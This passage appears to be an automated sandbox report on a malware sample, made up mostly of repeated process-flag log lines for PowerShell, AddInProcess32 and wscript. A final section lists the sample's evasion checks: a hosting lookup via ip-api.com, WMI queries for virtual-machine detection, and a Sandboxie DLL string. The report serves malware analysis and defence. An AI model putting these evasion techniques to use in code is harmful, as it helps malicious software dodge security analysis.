                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Check if machine is in data center or colocation facility
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
